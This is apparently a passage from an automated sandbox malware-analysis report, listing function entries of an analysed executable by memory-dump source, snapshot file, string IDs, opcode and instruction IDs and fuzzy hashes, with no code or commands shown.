                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F15183B4E142089FCB44EFACD98569EBBF0BF88300F518529E898E7350D774A945CF86
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %]Y#$@-./$I!M#$P)G+
                                                                                                                                                                                                                                              • API String ID: 0-2634571373
                                                                                                                                                                                                                                              • Opcode ID: 42bbe22632be0315e52129f2c4335a826d5090d4660edd3964ba4da0ad50b327
                                                                                                                                                                                                                                              • Instruction ID: 51cdea4b60f56710e6a86bb19e1ff66e610505c953ea40d9cc1e8744373e5cf5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42bbe22632be0315e52129f2c4335a826d5090d4660edd3964ba4da0ad50b327
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7DA13474608316DFE320CF24B88062BBBE5EB86304F55493DE9D19B291D735D80A8B9B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "$(}$D$}z
                                                                                                                                                                                                                                              • API String ID: 0-288630403
                                                                                                                                                                                                                                              • Opcode ID: 838c80af671b9f3c2f6c74f586491091195101ee1c8ba600b856b697149670be
                                                                                                                                                                                                                                              • Instruction ID: e312989b2c4792db848879f9bac54e9e2354a8202f9c92075631cf5adc1f1b71
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 838c80af671b9f3c2f6c74f586491091195101ee1c8ba600b856b697149670be
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 535114B05093808AE7348F11C9A575BBBE1FF81708F24891CE6D95B790D7BA9409CF86
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ,/$[z$jrTW
                                                                                                                                                                                                                                              • API String ID: 0-25380742
                                                                                                                                                                                                                                              • Opcode ID: aad448e5e141119624ce5ea80ae0f62c11a7ca72f167603081a76399b173a223
                                                                                                                                                                                                                                              • Instruction ID: 37d8b99ee0fc071fa72ea5f9e128431a57fb298bf1ebe83ab69a6401654ec06a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aad448e5e141119624ce5ea80ae0f62c11a7ca72f167603081a76399b173a223
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5C1F57250C3919BC322CF79889079BBFE1AFD7210F48496DE4D45B382D739990AC796
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 2C$bC$rC
                                                                                                                                                                                                                                              • API String ID: 0-501456740
                                                                                                                                                                                                                                              • Opcode ID: cdb9a8649a37df1c182bb21217c0e780be0c6e0eec2e67f505f83ea07c441e53
                                                                                                                                                                                                                                              • Instruction ID: bdc6b92e627a27bcb7d1270e44e76223523d24ebb0e0ecb33019788e0de75ff5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdb9a8649a37df1c182bb21217c0e780be0c6e0eec2e67f505f83ea07c441e53
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4251D23AB54231CFC7488FA8D8D165A77E2FB8A321F2A447DD906977A1DA749C11CB80
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 2C$bC$rC
                                                                                                                                                                                                                                              • API String ID: 0-501456740
                                                                                                                                                                                                                                              • Opcode ID: 7080bc0ac3e147c9e3a80f61a8ad691461d74ea4b3fa675f3593bf458fc39fe8
                                                                                                                                                                                                                                              • Instruction ID: f2eececc4741b3fa768bd15513f9d48caabc0daf360a8009deb7bee4f12945da
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7080bc0ac3e147c9e3a80f61a8ad691461d74ea4b3fa675f3593bf458fc39fe8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D513176E54231CFC7088FA8CC9266A77E2FB9A720F1A447DD946A7790D6785C01C790
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000003.1329889525.0000000000783000.00000004.00000020.00020000.00000000.sdmp, Offset: 00783000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_783000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: h$qb)
                                                                                                                                                                                                                                              • API String ID: 0-8020182
                                                                                                                                                                                                                                              • Opcode ID: 60ee444702f4109b24438a58d2bb9ac7bd5c0692df10bafd67a440d52b8b87cb
                                                                                                                                                                                                                                              • Instruction ID: 1628ea492aa70a212521170d355f6b43d17622ddc3ef697e6537e68888dbf378
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60ee444702f4109b24438a58d2bb9ac7bd5c0692df10bafd67a440d52b8b87cb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2842E26648E7D14FD703AB7098686A17FB0AF23225B1E41EBC1C4CF4E3E25D595AC722
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 0$8
                                                                                                                                                                                                                                              • API String ID: 0-46163386
                                                                                                                                                                                                                                              • Opcode ID: f625e4a7261f0f18c15e222e6bb8470ded69b8f6f22db671e404608b4911e8d4
                                                                                                                                                                                                                                              • Instruction ID: c3ff3b1eb68a7071d88dd215ac4557eea574da65afadce327f2987d36a3cbf3c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f625e4a7261f0f18c15e222e6bb8470ded69b8f6f22db671e404608b4911e8d4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A7225B16083419FD710CF18C880BABBBE1EF94354F04892EF9999B391D379D958CB96
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0076F000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_76f000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b86fca38b97cf6b60771da6860ef807ec37ec3e1e8489f31e49b331a5d395a69
                                                                                                                                                                                                                                              • Instruction ID: 0d71ce524d2743ea6a3212202cf2d6022903cc2e69c5ae9ebc37cf4fe80802e7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b86fca38b97cf6b60771da6860ef807ec37ec3e1e8489f31e49b331a5d395a69
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F92019181E7C12FCB178B709D69651BF706E13214B1E82CFC8D98F8E3E358991AD762
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: D$\]
                                                                                                                                                                                                                                              • API String ID: 0-161661275
                                                                                                                                                                                                                                              • Opcode ID: f393bd324d16e84f7dcddd299c04f002466304702a344b181c4b3588a1656cc5
                                                                                                                                                                                                                                              • Instruction ID: ca227c4ec1df78f483ae4196cbbf6a5c200726a8c714447d50598be346294755
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f393bd324d16e84f7dcddd299c04f002466304702a344b181c4b3588a1656cc5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55F17AB0018390CAE3708F24C4617ABBBF1FF92354F159A5DD4D91B391E37A8846CB9A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: W$Y$u
                                                                                                                                                                                                                                              • API String ID: 0-2168761075
                                                                                                                                                                                                                                              • Opcode ID: bc0553f2ec6d83140f29c4a4c1645253fe7306736b17025086c01e711f044156
                                                                                                                                                                                                                                              • Instruction ID: a8178e12f58bc97bca8d0dc7febadd7c5ff2793cc6100f147e671408075a2d1c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc0553f2ec6d83140f29c4a4c1645253fe7306736b17025086c01e711f044156
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7171257090C38046D721A7348895BFFBBE5EF9A318F18197DD4C9EB293E778441A831A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: @$L6E
                                                                                                                                                                                                                                              • API String ID: 0-1202440179
                                                                                                                                                                                                                                              • Opcode ID: d8b0ed3d3ed35ca566e28d0202b4fd0e3a3b5732efa50a356bf122df335a5052
                                                                                                                                                                                                                                              • Instruction ID: 4e482137c34d688586a8790d148c1a135da25de1ccbf402732ebb22660f76c81
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8b0ed3d3ed35ca566e28d0202b4fd0e3a3b5732efa50a356bf122df335a5052
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B31E372E1011487DB18CF64D8523AFB2B3EBD9304F29926DC402AB294EF394D068B88
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: Cw$\I
                                                                                                                                                                                                                                              • API String ID: 0-2532810310
                                                                                                                                                                                                                                              • Opcode ID: 0327ad6df3cfc3212e912bf6fa6d4556c19b7291280d92ff22280623eeed1bdf
                                                                                                                                                                                                                                              • Instruction ID: ad74ee78a5f92b8127c50bcc390207234b4fc517d47b268ffb0e40b26e0b77cb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0327ad6df3cfc3212e912bf6fa6d4556c19b7291280d92ff22280623eeed1bdf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E631EFB450A2408BD330AF24C8457ABB3B0EF86360F15462DE8998B3D1E7789840CB9A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: r[A
                                                                                                                                                                                                                                              • API String ID: 0-4037054645
                                                                                                                                                                                                                                              • Opcode ID: cb7947d40da40d97834472dcf3f5dcc627c72c3b9b42fb9eb3640c563b0a0460
                                                                                                                                                                                                                                              • Instruction ID: 02607fbad012d598115ffa089da0578be2a11f59ef4155b1d8870e3ec4b8e9f7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb7947d40da40d97834472dcf3f5dcc627c72c3b9b42fb9eb3640c563b0a0460
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72122338608300EBEB149F14E852BBB73A2FB86314F55593DE58257292D734EC52CB8A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                                                              • API String ID: 2994545307-1993550816
                                                                                                                                                                                                                                              • Opcode ID: b7bdc246ccb7d462daa229a7e869b2f5c654784963e2617bc7ff646c69b7c8b9
                                                                                                                                                                                                                                              • Instruction ID: cc1579294515130ab6a14a6d25e11bdc42e62a6ca6cd769fb05f4ebf758f629f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7bdc246ccb7d462daa229a7e869b2f5c654784963e2617bc7ff646c69b7c8b9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E932F471A083418FD714CF29C88072BBBE2FBC9324F159A2EE69597391D778D841CB96
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 2A
                                                                                                                                                                                                                                              • API String ID: 0-225269067
                                                                                                                                                                                                                                              • Opcode ID: 9b95ebee791168dd15b0200f1a2cf2fbacfec23ae234377c1ad937f2cd9d1e3f
                                                                                                                                                                                                                                              • Instruction ID: 85abb5cd35afa021b706273a3c55283967550840d126f63e6e2e3392557e96a0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b95ebee791168dd15b0200f1a2cf2fbacfec23ae234377c1ad937f2cd9d1e3f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0C1E0BAE412258BCB24CFA5C8927EFBB72FF95310F184159D8516B394E3399C42C798
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: )*
                                                                                                                                                                                                                                              • API String ID: 0-3726918850
                                                                                                                                                                                                                                              • Opcode ID: fc3ad291faf4bce7b0ab8804e48d0a64550710a3d411c306a19a8c5b5b6595d0
                                                                                                                                                                                                                                              • Instruction ID: 7eaddeec2ea1f3303c49058ef5387fd40852bbcee4b02125c76f17607886b80d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc3ad291faf4bce7b0ab8804e48d0a64550710a3d411c306a19a8c5b5b6595d0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65D1EE3A628212CBC714AF68DC4116B73F1FF8A311F0A887DD5848B2A0EB79DD21D755
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: ,
                                                                                                                                                                                                                                              • API String ID: 2994545307-3772416878
                                                                                                                                                                                                                                              • Opcode ID: 7875a27bf40f4fc8c2d82e021479082e37a865204141128c1e1d68dfc485cbf8
                                                                                                                                                                                                                                              • Instruction ID: 2270cf8c3bf95b6b9a4b7b53c356c1932a1531dc22156f57a77921fb7da3e809
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7875a27bf40f4fc8c2d82e021479082e37a865204141128c1e1d68dfc485cbf8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16C18E756083059FC714DF28C89096BB7E1FB89710F15992DE9958B361EB34EC05CB86
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 4FB
                                                                                                                                                                                                                                              • API String ID: 0-3805437025
                                                                                                                                                                                                                                              • Opcode ID: 1dbb53b80093d5632196cbd795976bc65ef7f0784fd8723698ae9e5edd3748ba
                                                                                                                                                                                                                                              • Instruction ID: 702288ba934b2ab972ed5445351e24d6f7babd7879836e3fd078900fd9156e04
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1dbb53b80093d5632196cbd795976bc65ef7f0784fd8723698ae9e5edd3748ba
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2C1AB79608301DFD714CF28EC8162AB3E1FB8A314F4A897CE986D7291D739E911CB56
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 23
                                                                                                                                                                                                                                              • API String ID: 0-326707096
                                                                                                                                                                                                                                              • Opcode ID: 580a6dc72aec8c93fd3457cac589536d236eacae8dc85020da763fb99c288834
                                                                                                                                                                                                                                              • Instruction ID: d15a7f3d0c545fbc0fa56a034e23d1be3dc09a325538403ca9fbca7615165276
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 580a6dc72aec8c93fd3457cac589536d236eacae8dc85020da763fb99c288834
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FB107356083628BC714DF29D8401AFB3E2FF95744F9AC82DE8C597214D7389906CB9A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: -
                                                                                                                                                                                                                                              • API String ID: 0-2547889144
                                                                                                                                                                                                                                              • Opcode ID: 8e888e3937aaff25ae9a4bc71968b5b37194e995f4b18d90443b1d4237c3d3ef
                                                                                                                                                                                                                                              • Instruction ID: f68e524e7254b4660943573ebb3b2c87bf021edc5c4c8ad388b9b0f093c0a0eb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e888e3937aaff25ae9a4bc71968b5b37194e995f4b18d90443b1d4237c3d3ef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26C1293190C6128BC314CF18C59026BB7E2EFC1314F198A6EE4D56B3D6DB399C468B86
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: wh
                                                                                                                                                                                                                                              • API String ID: 0-1657672868
                                                                                                                                                                                                                                              • Opcode ID: 34f5e35ccb0b7067b75c91b565eb4a1bebf6d54a11298902348dd9cd03349970
                                                                                                                                                                                                                                              • Instruction ID: 57d3a3825b2d42f5a7cfc181a0f401970f1dc9900973f97b9cd2b46a36910ecf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34f5e35ccb0b7067b75c91b565eb4a1bebf6d54a11298902348dd9cd03349970
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E57146B1A083518BC724CF29C8917A7B7E1EFD6314F18856EE8C59B391E738D841CB96
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %&
                                                                                                                                                                                                                                              • API String ID: 0-2066171877
                                                                                                                                                                                                                                              • Opcode ID: 39e65b155247fb68aa354ac9a8c2dfa4964aebb8e2009788d167cb395f4039b7
                                                                                                                                                                                                                                              • Instruction ID: ba67d0a08b93d8a532d907c39b2aeb07db53e999ca3775cdf0b4e574211894b0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39e65b155247fb68aa354ac9a8c2dfa4964aebb8e2009788d167cb395f4039b7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 247133B16083648FC320DF59D89126BBBE1FF81314F558A2DE8C99B391E778D905CB4A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                                                                              • API String ID: 0-123907689
                                                                                                                                                                                                                                              • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                              • Instruction ID: 3fcf3b7e11eebe149ab50efa3b977903c19f43c43c449435da1c0d4673b0aaa2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C471F432B083654BD714CE2DE48031FBBE2EBC5710FA9892EE4948B395D7789C4587CA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1607924272.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1607924272.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: m-/.
